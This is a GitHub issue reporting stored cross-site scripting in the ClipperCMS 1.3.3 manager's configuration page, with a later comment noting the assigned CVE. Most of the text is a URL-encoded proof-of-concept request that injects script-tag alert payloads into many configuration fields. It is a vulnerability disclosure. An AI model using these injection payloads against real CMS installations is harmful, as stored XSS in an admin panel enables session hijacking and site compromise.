Skip to content
This repository has been archived by the owner on Jul 22, 2020. It is now read-only.

Stored XSS is found in CMS Clipper_1.3.3 version #489

Open
PrincyEdward opened this issue Jul 3, 2018 · 1 comment
Open

Stored XSS is found in CMS Clipper_1.3.3 version #489

PrincyEdward opened this issue Jul 3, 2018 · 1 comment

Comments

@PrincyEdward
Copy link

Affected Version : Clipper_1.3.3
Affected URL:
http://{host}/ClipperCMS-clipper_1.3.3/manager/
Steps to POC:
1. Under Tools -> Configuration
Found multiple stored XSS
valid_hostnames=%22%3Cscript%3Ealert%281%29%22%3C%2Fscript%3E&modx_charset=iso-8859-1&xhtml_urls=1&site_start=1%22%3Cscript%3Ea&error_page=1%22%3Cscript%3Ea&unauthorized_page=1%22%3Cscript%3Ea&site_status=1&site_unavailable_page=%22%3Cscript%3Eal&reload_site_unavailable=&site_unavailable_message=%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E&siteunavailable_message_default=The+site+is+currently+unavailable.&track_visitors=0&auto_template_logic=parent&template_rules_tv=%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E&default_template=3&old_template=3&publish_default=0&cache_default=0&search_default=0&auto_menuindex=1&txt_custom_contenttype=%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E&custom_contenttype=%2C%22%3Cscript%3Ealert%281%29%22%3C%2Fscript%3E%2C%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E%2Capplication%2Fpdf%2Capplication%2Frss%2Bxml%2Capplication%2Fvnd.ms-excel%2Capplication%2Fvnd.ms-word%2Ctext%2Fcss%2Ctext%2Fhtml%2Ctext%2Fjavascript%2Ctext%2Fplain%2Ctext%2Fxml&server_offset_time=-68400&server_protocol=http&rss_len=%22%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E&error_handling_deprecated=1&error_handling_silent=0&jquery_url=assets%2Fjs%2Fjquery.min.js%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E&jquery_plugin_dir=assets%2Fjs%2F%2F%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E&jquery_noconflict=1&friendly_urls=0&friendly_url_prefix=&friendly_url_suffix=.html&friendly_alias_urls=1&use_alias_path=0&allow_duplicate_alias=0&automatic_alias=1&use_udperms=1&udperms_allowroot=0&failed_login_attempts=%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E&webuser_hash_method=1&blocked_minutes=%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E&reload_captcha_words=&captcha_words=%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E&captcha_words_default=ClipperCMS%2CAccess%2CBetter%2CBitCode%2CChunk%2CCache%2CDesc%2CDesign%2CExcell%2CEnjoy%2CURLs%2CTechView%2CGerald%2CGriff%2CHumphrey%2CHoliday%2CIntel%2CIntegration%2CJoystick%2CJoin%28%29%2COscope%2CGenetic%2CLight%2CLikeness%2CMarit%2CMaaike%2CNiche%2CNetherlands%2COrdinance%2COscillo%2CParser%2CPhusion%2CQuery%2CQuestion%2CRegalia%2CRighteous%2CSnippet%2CSentinel%2CTemplate%2CThespian%2CUnity%2CEnterprise%2CVerily%2CTattoo%2CVeri%2CWebsite%2CWideWeb%2CYap%2CYellow%2CZebra%2CZygote&emailsender=%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E&smtp=0&smtp_host=%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E&smtp_port=%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E&smtp_prefix=ssl%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E&smtp_user=%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E&smtp_pass=%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E&reload_emailsubject=&emailsubject=%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E&emailsubject_default=Your+login+details&reload_signupemail_message=&signupemail_message=%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E&system_email_signup_default=Hello+%5B%2Buid%2B%5D+%0D%0A%0D%0AHere+are+your+login+details+for+%5B%2Bsname%2B%5D+Content+Manager%3A%0D%0A%0D%0AUsername%3A+%5B%2Buid%2B%5D%0D%0APassword%3A+%5B%2Bpwd%2B%5D%0D%0A%0D%0AOnce+you+log+into+the+Content+Manager+%28%5B%2Bsurl%2B%5D%29%2C+you+can+change+your+password.%0D%0A%0D%0ARegards%2C%0D%0ASite+Administrator&reload_websignupemail_message=&websignupemail_message=%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E%0D%0AOnce+you+log+into+%5B%2Bsname%2B%5D+%28%5B%2Bsurl%2B%5D%29%2C+you+can+change+your+password.%0D%0A%0D%0ARegards%2C%0D%0ASite+Administrator&system_email_websignup_default=Hello+%5B%2Buid%2B%5D%0D%0A%0D%0AHere+are+your+login+details+for+%5B%2Bsname%2B%5D%3A%0D%0A%0D%0AUsername%3A+%5B%2Buid%2B%5D%0D%0APassword%3A+%5B%2Bpwd%2B%5D%0D%0A%0D%0AOnce+you+log+into+%5B%2Bsname%2B%5D+%28%5B%2Bsurl%2B%5D%29%2C+you+can+change+your+password.%0D%0A%0D%0ARegards%2C%0D%0ASite+Administrator&reload_system_email_webreminder_message=&webpwdreminder_message=%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E&system_email_webreminder_default=Hello+%5B%2Buid%2B%5D%0D%0A%0D%0ATo+activate+your+new+password+click+the+following+link%3A%0D%0A%0D%0A%5B%2Bsurl%2B%5D%0D%0A%0D%0AIf+successful+you+can+use+the+following+password+to+login%3A%0D%0A%0D%0APassword%3A%5B%2Bpwd%2B%5D%0D%0A%0D%0AIf+you+did+not+request+this+email+then+please+ignore+it.%0D%0A%0D%0ARegards%2C%0D%0ASite+Administrator&manager_language=english&manager_theme=ClipperModern&warning_visibility=1&docid_visibility=1&tree_page_click=27&remember_last_tab=1&tree_show_protected=0&rss_url_news=http%3A%2F%2Fwww.clippercms.com%2Fforum%2Fextern.php%3Faction%3Dfeed%26fid%3D3%2C31%26type%3Drss%26order%3Dposted%22%3Cscript%3Ealert%281%29%22%3C%2Fscript%3E&rss_url_security=http%3A%2F%2Fwww.clippercms.com%2Fforum%2Fextern.php%3Faction%3Dfeed%26fid%3D22%26type%3Drss%26order%3Dposted%22%3Cscript%3Ealert%281%29%22%3C%2Fscript%3E&datepicker_year_range=%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E&date_format=mm%2Fdd%2Fyy&time_format=HH%3Amm%3Ass&number_of_logs=%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E&number_of_results=%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E&validate_referer=1&strip_image_paths=1&use_browser=1&rb_webuser=0&rb_base_dir=%2F%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E&rb_base_url=assets%2F%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E&file_browser=mcpuk&upload_images=bmp%2Cico%2Cgif%2Cjpeg%2Cjpg%2Cpng%2Cpsd%2Ctif%2Ctiff%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E&upload_media=au%2Cavi%2Cmp3%2Cmp4%2Cmpeg%2Cmpg%2Cwav%2Cwmv%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E&upload_flash=fla%2Cflv%2Cswf%22%3Cscript%3Ealert%281%29%3B%22%3C%2Fscript%3E&clean_uploaded_filename=0&use_editor=1&which_editor=TinyMCE&fe_editor_lang=english&editor_css_path=%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E&tinymce_editor_theme=editor&tinymce_custom_plugins=style%2Cadvimage%2Cadvlink%2Csearchreplace%2Cprint%2Ccontextmenu%2Cpaste%2Cfullscreen%2Cnonbreaking%2Cxhtmlxtras%2Cvisualchars%2Cmedia%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E&tinymce_custom_buttons1=undo%2Credo%2Cselectall%2Cseparator%2Cpastetext%2Cpasteword%2Cseparator%2Csearch%2Creplace%2Cseparator%2Cnonbreaking%2Chr%2Ccharmap%2Cseparator%2Cimage%2Clink%2Cunlink%2Canchor%2Cmedia%2Cseparator%2Ccleanup%2Cremoveformat%2Cseparator%2Cfullscreen%2Cprint%2Ccode%2Chelp%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E&tinymce_custom_buttons2=bold%2Citalic%2Cunderline%2Cstrikethrough%2Csub%2Csup%2Cseparator%2Cbullist%2Cnumlist%2Coutdent%2Cindent%2Cseparator%2Cjustifyleft%2Cjustifycenter%2Cjustifyright%2Cjustifyfull%2Cseparator%2Cstyleselect%2Cformatselect%2Cseparator%2Cstyleprops%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E&tinymce_custom_buttons3=%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E&tinymce_custom_buttons4=%22%3Cscript%3Ealert%2810%29%22%3C%2Fscript%3E&tinymce_css_selectors=%22%3Cscript%3Ealert%281%29%22%3C%2Fscript%3E&filemanager_path=%2Fvar%2Fwww%2Fhtml%2Fclient63.lab%2Fsuganya%2FClipperCMS%2FClipperCMS-clipper_1.3.3%2F%22%3Cscript%3Ealert%281%29%22%3C%2Fscript%3E&upload_files=aac%2Cau%2Cavi%2Ccss%2Ccache%2Cdoc%2Cdocx%2Cgz%2Cgzip%2Chtaccess%2Chtm%2Chtml%2Cjs%2Cmp3%2Cmp4%2Cmpeg%2Cmpg%2Cods%2Codp%2Codt%2Cpdf%2Cppt%2Cpptx%2Crar%2Ctar%2Ctgz%2Ctxt%2Cwav%2Cwmv%2Cxls%2Cxlsx%2Cxml%2Cz%2Czip%2C%22%3Cscript%3Ealert%2810%22%3C%2Fscript%3E&upload_maxsize=1048576%22%3Cscript%3Ealert%281%29%3B%22%3C%2Fscript%3E&new_file_permissions=%22%22%3Cscript%3Ealert%281%29%3B%22%3C%2Fscript%3E&new_folder_permissions=%22%22%3Cscript%3Ealert%281%29%3B%22%3C%2Fscript%3E
image

image

@fgeek
Copy link

fgeek commented Nov 12, 2018

CVE-2018-13106 has been assigned for this vulnerability.

Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants